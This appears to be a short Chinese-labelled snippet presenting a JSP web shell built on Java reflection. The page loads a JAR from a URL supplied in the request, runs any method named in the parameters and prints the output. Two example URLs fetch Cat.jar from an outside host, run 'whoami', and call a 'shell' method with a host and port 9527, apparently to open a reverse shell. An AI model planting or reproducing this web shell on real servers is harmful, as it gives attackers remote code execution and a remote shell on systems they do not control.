jsp 反射
参数只实现了String和int,Cat.jar
http://localhost:8080/cat.jsp?url=http://javaweb.org/Cat.jar&class=Cat&method=exec&methodParameterClass=java.lang.String¶meter=whoami
http://localhost:8080/cat.jsp?url=http://javaweb.org/Cat.jar&class=Cat&method=shell&methodParameterClass=java.lang.String&methodParameterClass=int¶meter=p2j.cn¶meter=9527
<%
java.net.URLClassLoader ucl = new java.net.URLClassLoader(new java.net.URL[] {new java.net.URL(request.getParameter("url")) });
Class c = Class.forName(request.getParameter("class"),true,ucl);
java.lang.reflect.Method[] methods = c.getDeclaredMethods();
java.lang.reflect.Method m = null;
String[] parameter = request.getParameterValues("parameter");
Object[] parameterClass = new Object[parameter.length];
for(java.lang.reflect.Method method :methods){
if(request.getParameter("method").equals(method.getName())){
if(method.getParameterTypes().length >0){
Class[] tc = method.getParameterTypes();
String[] arr = new String[tc.length];
for(int i = 0; i < tc.length; i++){
parameterClass[i] = "java.lang.String".equals(tc[i].getName())?parameter[i]:Integer.parseInt(parameter[i]);
arr[i] = tc[i].getName();
}
if(java.util.Arrays.equals(request.getParameterValues("methodParameterClass"),arr)){
m = method;
break ;
}
}else{
m = method;
}
}
}
out.println(m.invoke(c.newInstance(), parameterClass));
%>